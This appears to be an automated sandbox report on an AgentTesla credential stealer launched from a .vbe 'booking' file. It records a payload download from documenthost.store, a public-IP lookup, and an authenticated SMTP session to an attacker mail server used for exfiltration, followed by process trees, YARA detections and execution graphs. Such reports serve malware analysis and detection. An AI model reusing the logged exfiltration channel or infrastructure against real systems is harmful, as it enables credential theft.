    server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=772&delivery_rate=2399337&cwnd=80&unsent_bytes=0&cid=8ebb8220f5082799&ts=404&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49712 | 172.67.215.48 | 443 | 7252 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 12:40:05 UTC | 161 | OUT | GET /2910/file HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: documenthost.store
2024-11-12 12:40:06 UTC | 821 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 12:40:06 GMT
    Content-Length: 3952
    Connection: close
    Last-Modified: Sun, 03 Nov 2024 03:20:50 GMT
    ETag: "f70-625f9a7aaa0ed"
    Accept-Ranges: bytes
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpTs4zzg3K%2BzWRwZa3Kc5egVWmnGbW6WVGWNkPQzKo%2BffO7Jtf4biMOhTc1qK8GPf6UP%2BTzQgWt%2B%2BWxCn%2BrNMwKGLKrVeEqXfttC0oZ9sVslMPHCGk5pkAsYRtdYhTF6SSE1EyU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e1696adcd65e599-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=775&delivery_rate=2331723&cwnd=251&unsent_bytes=0&cid=3dc4d86ffaee12d5&ts=458&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49981 | 104.26.12.205 | 443 | 3276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 12:41:10 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-11-12 12:41:10 UTC | 398 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 12:41:10 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: close
    Vary: Origin
    cf-cache-status: DYNAMIC
    Server: cloudflare
    CF-RAY: 8e16983f7aad47ac-DFW
    server-timing: cfL4;desc="?proto=TCP&rtt=973&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2967213&cwnd=251&unsent_bytes=0&cid=1378cbdc19b839c0&ts=267&x=0"
2024-11-12 12:41:10 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38
    Data Ascii: 173.254.250.68


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 12, 2024 13:41:12.449523926 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix
Nov 12, 2024 13:41:12.449799061 CET | 49983 | 587 | 192.168.2.5 | 162.254.34.31 | EHLO 302494
Nov 12, 2024 13:41:12.609038115 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 250-server1.educt.shop127.0.0.1
    250-PIPELINING
    250-SIZE 204800000
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250-DSN
    250 CHUNKING
Nov 12, 2024 13:41:12.609981060 CET | 49983 | 587 | 192.168.2.5 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Nov 12, 2024 13:41:12.769959927 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Nov 12, 2024 13:41:12.947962046 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 235 2.7.0 Authentication successful
Nov 12, 2024 13:41:12.948215961 CET | 49983 | 587 | 192.168.2.5 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
Nov 12, 2024 13:41:13.107741117 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 250 2.1.0 Ok
Nov 12, 2024 13:41:13.110208035 CET | 49983 | 587 | 192.168.2.5 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
Nov 12, 2024 13:41:13.271050930 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 250 2.1.5 Ok
Nov 12, 2024 13:41:13.274245024 CET | 49983 | 587 | 192.168.2.5 | 162.254.34.31 | DATA
Nov 12, 2024 13:41:13.433584929 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 354 End data with <CR><LF>.<CR><LF>
Nov 12, 2024 13:41:13.436924934 CET | 49983 | 587 | 192.168.2.5 | 162.254.34.31 | .
Nov 12, 2024 13:41:13.600332022 CET | 587 | 49983 | 162.254.34.31 | 192.168.2.5 | 250 2.0.0 Ok: queued as 2F34860AFA


Target ID: 0
Start time: 07:39:45
Start date: 12/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe"
Imagebase: 0x7ff768740000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:40:04
Start date: 12/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
Imagebase: 0x7ff768740000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 07:41:02
Start date: 12/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
Imagebase: 0x7ff768740000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 07:41:02
Start date: 12/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 07:41:02
Start date: 12/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 07:41:07
Start date: 12/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase: 0xd80000
File size: 45'984 bytes
                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296808679.00000000030C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296808679.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296808679.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3294593134.0000000001152000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:07:41:08
                                                    Start date:12/11/2024
                                                    Path:C:\Windows\System32\wermgr.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0"
                                                    Imagebase:0x7ff6070d0000
                                                    File size:229'728 bytes
                                                    MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:10.7%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:186
                                                      Total number of Limit Nodes:12
                                                      execution_graph 39937 2ea0848 39939 2ea084e 39937->39939 39938 2ea091b 39939->39938 39943 6b21cf0 39939->39943 39947 6b21d00 39939->39947 39951 2ea1380 39939->39951 39944 6b21d0f 39943->39944 39955 6b21494 39944->39955 39948 6b21d0f 39947->39948 39949 6b21494 2 API calls 39948->39949 39950 6b21d30 39949->39950 39950->39939 39952 2ea138b 39951->39952 39953 2ea1480 39952->39953 40078 2ea7ea8 39952->40078 39953->39939 39956 6b2149f 39955->39956 39959 6b22bf4 39956->39959 39958 6b236b6 39958->39958 39960 6b22bff 39959->39960 39961 6b23ddc 39960->39961 39964 6b25a63 39960->39964 39968 6b25a68 39960->39968 39961->39958 39966 6b25a68 39964->39966 39965 6b25aad 39965->39961 39966->39965 39972 6b25c18 39966->39972 39969 6b25a89 39968->39969 39970 6b25aad 39969->39970 39971 6b25c18 2 API calls 39969->39971 39970->39961 39971->39970 39973 6b25c25 39972->39973 39974 6b25c5e 39973->39974 39976 6b24dc8 39973->39976 39974->39965 39977 6b24dd3 39976->39977 39979 6b25cd0 39977->39979 39980 6b24dfc 39977->39980 39979->39979 39981 6b24e07 39980->39981 39987 6b24e0c 39981->39987 39983 6b25d3f 39991 6b2b060 39983->39991 40000 6b2b048 39983->40000 39984 6b25d79 39984->39979 39990 6b24e17 39987->39990 39988 6b26ee0 39988->39983 39989 6b25a68 2 API calls 39989->39988 39990->39988 39990->39989 39993 6b2b191 39991->39993 39994 6b2b091 39991->39994 39992 6b2b09d 39992->39984 39993->39984 39994->39992 40009 6b2b2d8 39994->40009 40013 6b2b2c8 39994->40013 39995 6b2b0dd 40018 6b2c5d8 39995->40018 40030 6b2c5c9 39995->40030 40002 6b2b091 40000->40002 40003 6b2b191 40000->40003 40001 6b2b09d 40001->39984 40002->40001 40005 6b2b2d8 GetModuleHandleW 40002->40005 40006 6b2b2c8 GetModuleHandleW 40002->40006 40003->39984 40004 6b2b0dd 40007 6b2c5d8 2 API calls 40004->40007 40008 6b2c5c9 2 API calls 40004->40008 40005->40004 40006->40004 40007->40003 40008->40003 40042 6b2b328 40009->40042 40049 6b2b318 40009->40049 40010 6b2b2e2 40010->39995 40014 
6b2b2d8 40013->40014 40016 6b2b328 GetModuleHandleW 40014->40016 40017 6b2b318 GetModuleHandleW 40014->40017 40015 6b2b2e2 40015->39995 40016->40015 40017->40015 40019 6b2c603 40018->40019 40056 6b2a35c 40019->40056 40022 6b2c686 40025 6b2c6b2 40022->40025 40071 6b2a28c 40022->40071 40028 6b2a35c GetModuleHandleW 40028->40022 40031 6b2c603 40030->40031 40032 6b2a35c GetModuleHandleW 40031->40032 40033 6b2c66a 40032->40033 40039 6b2cb40 GetModuleHandleW 40033->40039 40040 6b2ca91 GetModuleHandleW 40033->40040 40041 6b2a35c GetModuleHandleW 40033->40041 40034 6b2c686 40035 6b2a28c GetModuleHandleW 40034->40035 40037 6b2c6b2 40034->40037 40036 6b2c6f6 40035->40036 40038 6b2d4c0 CreateWindowExW 40036->40038 40038->40037 40039->40034 40040->40034 40041->40034 40043 6b2b339 40042->40043 40046 6b2b354 40042->40046 40044 6b2a28c GetModuleHandleW 40043->40044 40045 6b2b344 40044->40045 40045->40046 40047 6b2b5c0 GetModuleHandleW 40045->40047 40048 6b2b5b1 GetModuleHandleW 40045->40048 40046->40010 40047->40046 40048->40046 40050 6b2b31d 40049->40050 40051 6b2a28c GetModuleHandleW 40050->40051 40053 6b2b354 40050->40053 40052 6b2b344 40051->40052 40052->40053 40054 6b2b5c0 GetModuleHandleW 40052->40054 40055 6b2b5b1 GetModuleHandleW 40052->40055 40053->40010 40054->40053 40055->40053 40057 6b2a367 40056->40057 40058 6b2c66a 40057->40058 40059 6b2ccb0 GetModuleHandleW 40057->40059 40060 6b2cca0 GetModuleHandleW 40057->40060 40058->40028 40061 6b2ca91 40058->40061 40066 6b2cb40 40058->40066 40059->40058 40060->40058 40062 6b2ca9d 40061->40062 40063 6b2caab 40062->40063 40064 6b2ccb0 GetModuleHandleW 40062->40064 40065 6b2cca0 GetModuleHandleW 40062->40065 40063->40022 40064->40063 40065->40063 40067 6b2cb6d 40066->40067 40068 6b2cbee 40067->40068 40069 6b2ccb0 GetModuleHandleW 40067->40069 40070 6b2cca0 GetModuleHandleW 40067->40070 40069->40068 40070->40068 40073 6b2b518 GetModuleHandleW 40071->40073 40074 6b2b58d 40073->40074 40075 6b2d4c0 40074->40075 40076 6b2a444 
CreateWindowExW 40075->40076 40077 6b2d4f5 40076->40077 40077->40025 40079 2ea7eb2 40078->40079 40080 2ea7ecc 40079->40080 40083 6b3faa9 40079->40083 40087 6b3fab8 40079->40087 40080->39952 40085 6b3facd 40083->40085 40084 6b3fce2 40084->40080 40085->40084 40086 6b3fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 40085->40086 40086->40085 40089 6b3facd 40087->40089 40088 6b3fce2 40088->40080 40089->40088 40090 6b3fcf7 GlobalMemoryStatusEx GlobalMemoryStatusEx 40089->40090 40090->40089 40091 183d030 40092 183d048 40091->40092 40093 183d0a2 40092->40093 40098 6b2d6c8 40092->40098 40102 6b2e818 40092->40102 40111 6b2d6c7 40092->40111 40115 6b2a46c 40092->40115 40099 6b2d6ee 40098->40099 40100 6b2a46c CallWindowProcW 40099->40100 40101 6b2d70f 40100->40101 40101->40093 40105 6b2e855 40102->40105 40103 6b2e889 40140 6b2e49c 40103->40140 40105->40103 40106 6b2e879 40105->40106 40124 6b2e9b0 40106->40124 40129 6b2ea7c 40106->40129 40135 6b2e9a0 40106->40135 40107 6b2e887 40112 6b2d6c8 40111->40112 40113 6b2a46c CallWindowProcW 40112->40113 40114 6b2d70f 40113->40114 40114->40093 40116 6b2a477 40115->40116 40117 6b2e889 40116->40117 40119 6b2e879 40116->40119 40118 6b2e49c CallWindowProcW 40117->40118 40120 6b2e887 40118->40120 40121 6b2e9b0 CallWindowProcW 40119->40121 40122 6b2e9a0 CallWindowProcW 40119->40122 40123 6b2ea7c CallWindowProcW 40119->40123 40121->40120 40122->40120 40123->40120 40125 6b2e9c4 40124->40125 40144 6b2ea58 40125->40144 40148 6b2ea68 40125->40148 40126 6b2ea50 40126->40107 40130 6b2ea3a 40129->40130 40131 6b2ea8a 40129->40131 40133 6b2ea68 CallWindowProcW 40130->40133 40134 6b2ea58 CallWindowProcW 40130->40134 40132 6b2ea50 40132->40107 40133->40132 40134->40132 40137 6b2e9b1 40135->40137 40136 6b2ea50 40136->40107 40138 6b2ea68 CallWindowProcW 40137->40138 40139 6b2ea58 CallWindowProcW 40137->40139 40138->40136 40139->40136 40141 6b2e4a7 40140->40141 40142 6b2fcea CallWindowProcW 40141->40142 40143 6b2fc99 40141->40143 40142->40143 40143->40107 
40145 6b2ea68 40144->40145 40146 6b2ea79 40145->40146 40151 6b2fc20 40145->40151 40146->40126 40149 6b2ea79 40148->40149 40150 6b2fc20 CallWindowProcW 40148->40150 40149->40126 40150->40149 40152 6b2e49c CallWindowProcW 40151->40152 40153 6b2fc3a 40152->40153 40153->40146 40154 6b22e08 40155 6b22e4e 40154->40155 40159 6b22fe8 40155->40159 40162 6b22fd8 40155->40162 40156 6b22f3b 40166 6b22b20 40159->40166 40163 6b22fe8 40162->40163 40164 6b22b20 DuplicateHandle 40163->40164 40165 6b23016 40164->40165 40165->40156 40167 6b23050 DuplicateHandle 40166->40167 40168 6b23016 40167->40168 40168->40156

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 659 6b33100-6b33121 660 6b33123-6b33126 659->660 661 6b33128-6b33147 660->661 662 6b3314c-6b3314f 660->662 661->662 663 6b338f0-6b338f2 662->663 664 6b33155-6b33174 662->664 665 6b338f4 663->665 666 6b338f9-6b338fc 663->666 672 6b33176-6b33179 664->672 673 6b3318d-6b33197 664->673 665->666 666->660 669 6b33902-6b3390b 666->669 672->673 674 6b3317b-6b3318b 672->674 677 6b3319d-6b331ac 673->677 674->677 785 6b331ae call 6b33920 677->785 786 6b331ae call 6b33918 677->786 678 6b331b3-6b331b8 679 6b331c5-6b334a2 678->679 680 6b331ba-6b331c0 678->680 701 6b338e2-6b338ef 679->701 702 6b334a8-6b33557 679->702 680->669 711 6b33580 702->711 712 6b33559-6b3357e 702->712 713 6b33589-6b3359c 711->713 712->713 716 6b335a2-6b335c4 713->716 717 6b338c9-6b338d5 713->717 716->717 720 6b335ca-6b335d4 716->720 717->702 718 6b338db 717->718 718->701 720->717 721 6b335da-6b335e5 720->721 721->717 722 6b335eb-6b336c1 721->722 734 6b336c3-6b336c5 722->734 735 6b336cf-6b336ff 722->735 734->735 739 6b33701-6b33703 735->739 740 6b3370d-6b33719 735->740 739->740 741 6b3371b-6b3371f 740->741 742 6b33779-6b3377d 740->742 741->742 745 6b33721-6b3374b 741->745 743 6b33783-6b337bf 742->743 744 6b338ba-6b338c3 742->744 755 6b337c1-6b337c3 743->755 756 6b337cd-6b337db 743->756 744->717 744->722 752 6b33759-6b33776 745->752 753 6b3374d-6b3374f 745->753 752->742 753->752 755->756 759 6b337f2-6b337fd 756->759 760 6b337dd-6b337e8 756->760 764 6b33815-6b33826 759->764 765 6b337ff-6b33805 759->765 760->759 763 6b337ea 760->763 763->759 769 6b33828-6b3382e 764->769 770 6b3383e-6b3384a 764->770 766 6b33807 765->766 767 6b33809-6b3380b 765->767 766->764 767->764 771 6b33832-6b33834 769->771 772 6b33830 769->772 774 6b33862-6b338b3 770->774 775 6b3384c-6b33852 770->775 771->770 772->770 774->744 776 6b33856-6b33858 775->776 777 6b33854 775->777 776->774 777->774 785->678 786->678
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-3723351465
                                                      • Opcode ID: deb8f2381e4bf810d571b75daf30bfd10139c31dc573b17391f17663273f6465
                                                      • Instruction ID: 17c21dc5e1cbb202086aeac62d753a7d83d22c79e4a9f440140e0b65847a04ff
                                                      • Opcode Fuzzy Hash: deb8f2381e4bf810d571b75daf30bfd10139c31dc573b17391f17663273f6465
                                                      • Instruction Fuzzy Hash: 15323E31E10659CFCB14DF79D89459DB7B2FFC9300F10D6AAD409AB224EB34A985CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1329 6b37df0-6b37e0e 1330 6b37e10-6b37e13 1329->1330 1331 6b37e15-6b37e2f 1330->1331 1332 6b37e34-6b37e37 1330->1332 1331->1332 1333 6b37e44-6b37e47 1332->1333 1334 6b37e39-6b37e42 1332->1334 1336 6b37e49-6b37e57 1333->1336 1337 6b37e5e-6b37e61 1333->1337 1334->1333 1344 6b37e96-6b37eac 1336->1344 1345 6b37e59 1336->1345 1338 6b37e63-6b37e7f 1337->1338 1339 6b37e84-6b37e86 1337->1339 1338->1339 1340 6b37e88 1339->1340 1341 6b37e8d-6b37e90 1339->1341 1340->1341 1341->1330 1341->1344 1349 6b37eb2-6b37ebb 1344->1349 1350 6b380c7-6b380d1 1344->1350 1345->1337 1351 6b380d2-6b380dc 1349->1351 1352 6b37ec1-6b37ede 1349->1352 1355 6b380de-6b38107 1351->1355 1356 6b3812d-6b3813e 1351->1356 1362 6b380b4-6b380c1 1352->1362 1363 6b37ee4-6b37f0c 1352->1363 1357 6b38109-6b3810c 1355->1357 1366 6b38123-6b38127 1356->1366 1367 6b38140-6b38184 1356->1367 1359 6b38112-6b38121 1357->1359 1360 6b38341-6b38344 1357->1360 1359->1366 1359->1367 1364 6b38367-6b3836a 1360->1364 1365 6b38346-6b38362 1360->1365 1362->1349 1362->1350 1363->1362 1381 6b37f12-6b37f1b 1363->1381 1369 6b38370-6b3837c 1364->1369 1370 6b38415-6b38417 1364->1370 1365->1364 1366->1356 1379 6b38315-6b3832b 1367->1379 1380 6b3818a-6b3819b 1367->1380 1378 6b38387-6b38389 1369->1378 1374 6b38419 1370->1374 1375 6b3841e-6b38421 1370->1375 1374->1375 1375->1357 1376 6b38427-6b38430 1375->1376 1384 6b383a1-6b383a5 1378->1384 1385 6b3838b-6b38391 1378->1385 1379->1360 1394 6b381a1-6b381be 1380->1394 1395 6b38300-6b3830f 1380->1395 1381->1351 1388 6b37f21-6b37f3d 1381->1388 1386 6b383b3 1384->1386 1387 6b383a7-6b383b1 1384->1387 1389 6b38393 1385->1389 1390 6b38395-6b38397 1385->1390 1392 6b383b8-6b383ba 1386->1392 1387->1392 1401 6b37f43-6b37f6d 1388->1401 1402 6b380a2-6b380ae 1388->1402 1389->1384 1390->1384 1396 6b383cb-6b38404 1392->1396 1397 6b383bc-6b383bf 1392->1397 1394->1395 1406 6b381c4-6b382ba call 6b36618 1394->1406 1395->1379 1395->1380 
1396->1359 1416 6b3840a-6b38414 1396->1416 1397->1376 1414 6b37f73-6b37f9b 1401->1414 1415 6b38098-6b3809d 1401->1415 1402->1362 1402->1381 1463 6b382c8 1406->1463 1464 6b382bc-6b382c6 1406->1464 1414->1415 1422 6b37fa1-6b37fcf 1414->1422 1415->1402 1422->1415 1428 6b37fd5-6b37fde 1422->1428 1428->1415 1429 6b37fe4-6b38016 1428->1429 1437 6b38021-6b3803d 1429->1437 1438 6b38018-6b3801c 1429->1438 1437->1402 1440 6b3803f-6b38096 call 6b36618 1437->1440 1438->1415 1439 6b3801e 1438->1439 1439->1437 1440->1402 1465 6b382cd-6b382cf 1463->1465 1464->1465 1465->1395 1466 6b382d1-6b382d6 1465->1466 1467 6b382e4 1466->1467 1468 6b382d8-6b382e2 1466->1468 1469 6b382e9-6b382eb 1467->1469 1468->1469 1469->1395 1470 6b382ed-6b382f9 1469->1470 1470->1395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q
                                                      • API String ID: 0-127220927
                                                      • Opcode ID: 683b22335e051a5a93c538d5e71a353052b66f3f09c1f6012cc311b3124bb8c8
                                                      • Instruction ID: e05e8981b8661a7302c5a3fd38191c8109e435d727027321b71abb9f6a01f085
                                                      • Opcode Fuzzy Hash: 683b22335e051a5a93c538d5e71a353052b66f3f09c1f6012cc311b3124bb8c8
                                                      • Instruction Fuzzy Hash: AA02AF70B006259FDB54DF68D590A9EB7E6FF84304F148568E806EB390DB79EC46CB82

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1604 2eae270-2eae292 1605 2eae2f6-2eae2fd 1604->1605 1606 2eae294-2eae2bf 1604->1606 1611 2eae2c6-2eae2d3 1606->1611 1613 2eae2fe-2eae365 1611->1613 1614 2eae2d5-2eae2ee 1611->1614 1624 2eae36e-2eae37e 1613->1624 1625 2eae367-2eae369 1613->1625 1614->1605 1627 2eae380 1624->1627 1628 2eae385-2eae395 1624->1628 1626 2eae60d-2eae614 1625->1626 1627->1626 1630 2eae39b-2eae3a9 1628->1630 1631 2eae5f4-2eae602 1628->1631 1634 2eae3af 1630->1634 1635 2eae615-2eae68e 1630->1635 1631->1635 1636 2eae604-2eae608 call 2ea7b10 1631->1636 1634->1635 1638 2eae5e8-2eae5f2 1634->1638 1639 2eae54e-2eae574 1634->1639 1640 2eae48c-2eae4ad 1634->1640 1641 2eae50c-2eae549 1634->1641 1642 2eae3cd-2eae3ee 1634->1642 1643 2eae440-2eae461 1634->1643 1644 2eae466-2eae487 1634->1644 1645 2eae5a7-2eae5c2 call 2ea0350 1634->1645 1646 2eae5c4-2eae5e6 1634->1646 1647 2eae41a-2eae43b 1634->1647 1648 2eae579-2eae5a5 1634->1648 1649 2eae4df-2eae507 1634->1649 1650 2eae4b2-2eae4da 1634->1650 1651 2eae3f3-2eae415 1634->1651 1652 2eae3b6-2eae3c8 1634->1652 1636->1626 1638->1626 1639->1626 1640->1626 1641->1626 1642->1626 1643->1626 1644->1626 1645->1626 1646->1626 1647->1626 1648->1626 1649->1626 1650->1626 1651->1626 1652->1626
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xaq$$]q
                                                      • API String ID: 0-1280934391
                                                      • Opcode ID: cf2e0f1a1c160e4c8172b3ad83fa75281d715a675f68a2208c34247da747d494
                                                      • Instruction ID: 70bd27f97c8a9a92b97f12e8c313e31cd806e9794b43357f7d38e8f2b5cfb810
                                                      • Opcode Fuzzy Hash: cf2e0f1a1c160e4c8172b3ad83fa75281d715a675f68a2208c34247da747d494
                                                      • Instruction Fuzzy Hash: D3B1B534B042149BCB18AB79946467E7BA7BFC8710B19C93DE406DB385DE349C02CB92
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff44a311b3297068f2b3b9489f694c620fc9d2a5a52d20ace7fb39ba0925a8f3
                                                      • Instruction ID: b08f3adc02a064c7a3295b8417f5fdbc2e6bc75635b6674243c47bac8badeaff
                                                      • Opcode Fuzzy Hash: ff44a311b3297068f2b3b9489f694c620fc9d2a5a52d20ace7fb39ba0925a8f3
                                                      • Instruction Fuzzy Hash: DE53E931D10B1A8ACB11EF68C8546A9F7B1FF99300F11D79AE4587B121EB70AAD5CF81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VUo
                                                      • API String ID: 0-3530549468
                                                      • Opcode ID: 0cd28ee61d51ffbc6ae0a4a1ef6704fd8b8da6506ab9d5af1b44b6dc60fbf9ec
                                                      • Instruction ID: 8926e29b35cfa320cead5af84af7d1319b60572a03ccce6510129ee27c913c29
                                                      • Opcode Fuzzy Hash: 0cd28ee61d51ffbc6ae0a4a1ef6704fd8b8da6506ab9d5af1b44b6dc60fbf9ec
                                                      • Instruction Fuzzy Hash: 83916DB0E50209CFDF10CFA9C9957DDBBF2AF88308F14D129E415AB294EB74A845CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c21b3852d4ee26529db55012a139cebc7e0dcad561be4306df920047d1b1af2
                                                      • Instruction ID: e37c6a0ff554fe460a417d5f7c1ebaa2b457d22856dbd03b3f76bc52e39c4971
